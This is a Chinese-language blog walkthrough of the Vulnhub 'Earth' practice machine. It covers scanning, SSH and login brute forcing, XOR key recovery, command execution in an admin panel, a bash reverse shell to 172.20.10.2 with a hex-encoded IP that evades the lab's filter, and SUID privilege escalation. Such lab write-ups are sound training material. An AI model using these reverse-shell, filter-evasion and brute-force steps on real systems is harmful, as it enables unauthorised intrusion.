Vulnhub-Earth

最新推荐文章于 2024-06-04 20:00:00 发布
最新推荐文章于 2024-06-04 20:00:00 发布
阅读量832 收藏
点赞数 1
分类专栏: Vulnhub 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52016680/article/details/126797460
版权

一、靶机IP探测

 arp-scan -l

 

172.20.10.1是路由器IP,172.20.10.12是宿主机的IP,确定靶机IP为172.20.10.5.

二、端口扫描

 nmap -T4 -sV -p- -A 172.20.10.5

 

22端口是ssh端口,可以尝试爆破。

80和443两个端口是http端口,看到SAN(Subject Alternative Name)有两个域名。

三、端口分析

1、22端口ssh爆破

 hydra -l root -p ssh_password.txt 172.20.10.5 ssh

 

结果不出所料,失败。

2、http端口

通过浏览器访问80端口

 

80端口400.

访问443

 

443也一样。

根据经验,web业务一般都部署在80端口,所以对80端口进行分析。

服务器报400有两种可能。

1、错误的请求方式

2、不存在的域名

现在出现400可能是因为我们的dns没有解析域名。可以将扫描出来的两个域名进行绑定,然后尝试访问域名。

3、绑定域名

 sudo vim /etc/hosts

 

添加光标所在行的信息,然后保存退出。

四、访问网站

分别访问两个域名,发现长得一样。

 

在Message框里随便输入字符后提交,下面就会出现一行数字,判断是将输入的字符进行了一些加密操作得到的数字。

1、目录扫描

这里要注意http和https要分别进行扫描

 dirb http://earth.local

 

(https扫描结果和http相同)

发现了一个admin,访问后提示要login。

 

burpsuite爆破尝试一下。

 

intruder选择cluster bomb模式,选中两个要爆破的点位。

 

payload中设置爆破字典(kali的字典路径:/usr/share/wordlists)

爆破失败。

继续扫描另一个域名

 dirb http://terratest.earth.local

得到与上一个域名相同的文件。

扫描https

 dirb https://terratest.earth.local

 

robots.txt值得注意,访问一下。

 

最后这个应该是一个提示信息,访问一下,猜测后缀名是txt。

 https://terratest.earth.local/testingnotes.txt

 

翻译一下

测试安全消息系统注意事项:

*使用XOR加密作为算法,应该与RSA中使用的一样安全。

*地球已经确认他们收到了我们发送的信息。

*testdata.txt用于测试加密。

*terra用作管理门户的用户名。

待办事项:

*我们如何将每月的密钥安全地发送到地球?还是我们应该每周换一次钥匙?

*需要测试不同的密钥长度以防止暴力。钥匙应该多长时间?

*需要改进消息传递界面和管理面板的界面,它目前非常基本。

三条有用信息

加密算法是XOR(异或)

testdata.txt是加密文件

terra是管理员的用户名

先获取加密文件testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

编写脚本解密

 #密文是test.txt,就是首页的三行数字。密钥是testdata.txt
 import binascii
 testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
 for i in open('test.txt','r'):
     i = i.replace('\n','')
     print(hex(int(i,16) ^ int(testdata,16)))

得到结果

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e 0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b 0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

将三个十六进制数分别转文本。

最后一个十六进制数转出来是earthclimatechangebad4humans 一直循环。

 

此时得到后台管理员账号密码

 账号:terra
 密码:earthclimatechangebad4humans

登录后台

 

看到一个窗口可以命令执行。

直接找flag文件

 find / -name "*flag*"

 

找到一个

 cat /var/earth_web/user_flag.txt

得到flag

 

2、反弹shell

现在kali开启监听

 nc -lvvp 1234

1234为监听的端口,也就是shell要反弹到的端口。

尝试反弹shell

 bash -i >& /dev/tcp/172.20.10.2/1234 0>&1

 

显示禁止远程连接。

猜测是对ip地址进行了检测。用16进制表示ip,命令改为

 bash -i >& /dev/tcp/0xac.0x14.0x0a.0x02/1234 0>&1

反弹成功

3、进行提权

查找具有SUID权限的文件

 find / -perm -u=s -type f 2>/dev/null

 

发现一个叫reset_root的文件。

查看属性并执行

 ls -al /usr/bin/reset_root

 

发现没有正确运行。需要调试改文件。

用strace命令

 strace

 

发现靶机上没有strace命令,需要拉回到攻击机上测试。

在攻击机上新开一个终端监听放射链接的输出。

 nc -nvlp 1234>reset_boot

 

靶机上执行,链接重定向命令

 

攻击机的监听终端接收到文件。

 

攻击机终端执行命令

 ls -al

 

用strace命令调试

 strace ./reset_root

 

发现权限不够。

需要chmod赋权。

 sudo chmod +x reset_root

再strace一次

 

发现缺了三个文件,在靶机上新建这三个对应文件就可以了。

 mkdir /dev/shm/kHgTFI5G
 mkdir /dev/shm/Zw7bV9U5
 mkdir /tmp/kcM0Wewe
 /usr/bin/reset_root

 

得到密码 Earth

PDF版WP下载链接

https://github.com/4ooooo/Vulnhub_WP/blob/main/Vulnerhub-Earth.pdf

4ooo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
echarts-earth-3D
01-15
【echarts-earth-3D】是一个基于ECharts与Three.js库构建的3D地球可视化项目。ECharts是一款由百度开源的、轻量级且功能强大的数据可视化库,而Three.js是JavaScript中的一个流行3D库,它使得在浏览器中创建复杂的3D...
cesium-google-earth-examples:移植到 Cesium 的 Google Earth 插件 API 示例
07-24
谷歌地球插件 API 示例移植到 Cesium,开源 WebGL 虚拟地球和地图引擎。 单击下面的任何示例以运行它。 要了解有关 Cesium 的更多信息,请查看系列教程。 (谷歌地球) (谷歌地球) (谷歌地球) ...
Vulnhub 系列 -- Earth
ch3cke的博客
03-21 3814
前期信息收集 nmap主机发现,主要探测存活主机的IP和以及主机开放的端口信息: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:19 EDT Nmap scan report for 192.168.139.2 Host is up (0.0017s latency). Nmap scan report for 192.168.139.13
vulnhub——Earth靶机
Re1_zf的博客
10-28 2060
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
Vulnhub:The Planets: Earth
最新发布
weixin_69670995的博客
06-04 861
使用另一个域名在浏览器中访问,发现页面一样,dirb扫描出来的目录也一样,使用https访问另一域名,发现不一样的页面。提示密码使用异或算法,异或字符串放在testdata.txt,用户名是terra,访问testdata.txt。发现程序的作用是更改root密码,但是需要满足一些条件,使用strace进行调试。发现testingnotes文件,不知道后缀,尝试txt的时候访问成功。这里发现三个字符串,先不用管,使用dirb进行目录扫描。发现22,80,443使用浏览器访问80端口。
Vulnhub项目:Earth
Ays.Ie的博客
04-20 728
Vulnhub项目:Earth
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 682
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
CAD-Earth.v5.1.22.rar
08-16
当从谷歌Earth导入地形网格时,CAD-Earth演示版本有500点的限制。 只有10个对象可以导入或导出到谷歌Earth。 此外,所有导入或导出到谷歌Earth的图像都有“CAD-Earth Demo Version”文本水印线。 CAD-Earth注册版...
Google earth的替代品ArcGIS-Earth2.0版本:ArcGIS-Earth-x64-Setup-2.0.exe
08-23
Google earth的替代品ArcGIS-Earth2.0版本:ArcGIS-Earth-x64-Setup-2.0.exe
google-earth
02-11
google-earth-stable_current_amd64.deb
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1234
一次打靶记录。
vulnhub:EARTH靶机
qq_63283137的博客
09-13 989
在地球历史的最初10亿年里,海洋中出现了生命,并开始影响地球的大气和表面,导致厌氧生物的激增,后来又出现了好氧生物。从上面内容得到了一个信息,加密算法是xor,有个testdata.txt文件,用户名是terra。发现有个testingnotes文件,但是不知道是何种格式,自己尝试测试发现是txt文件格式。或者我们应该每周换一次钥匙?发现是禁止远程链接,发现需要对ip地址进行16进制的转化绕过。*需要改进的消息界面和管理面板的界面,它目前是非常基本的。*使用XOR加密作为算法,应该是安全的RSA使用。
打靶分享:VulnHub-Earth
weixin_66249173的博客
01-07 1121
此时使用nmap -sC 10.0.0.141发现了不一样的内容,就是443端口这里发现了DNS的两个域名,所以我就查了一下-sC这个参数(平时信息收集其实用的不多)所以,最好的解决办法就是直接在终端打开虚拟机火狐浏览器并访问earth.local和terratest.earth.local在第一个域名中如果想发送message必须要输入message key。此时就可以访问这两个域名了,但是不要用物理机的浏览器直接访问。现在就差解密的内容了,显然下面这张图中的那三行是我们要解密的内容。
【靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2296
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
vulnhub Earth:解题思路
lm19770429的专栏
01-28 3197
靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#download Earth is an easy box though you will likely find it more challenging t
VulnHub靶场----Earth
qq_61670993的博客
10-18 503
Vulnhub靶场初体验
Vulnhub】之THE PLANETS: EARTH
zg_111的博客
03-31 1320
XOR(异或)运算strace诊断调试工具nc传输文件。
vuluhub
avasy的博客
02-11 1188
Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in fren...
sklearn-contrib-py-earth
04-30
sklearn-contrib-py-earth是一个开发工具包,用于利用普通最小二乘回归来拟合灵活且高维度的非线性模型。它是基于Mars算法(Multivariate adaptive regression splines)开发的,可以在非线性回归和特征选择方面提供...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值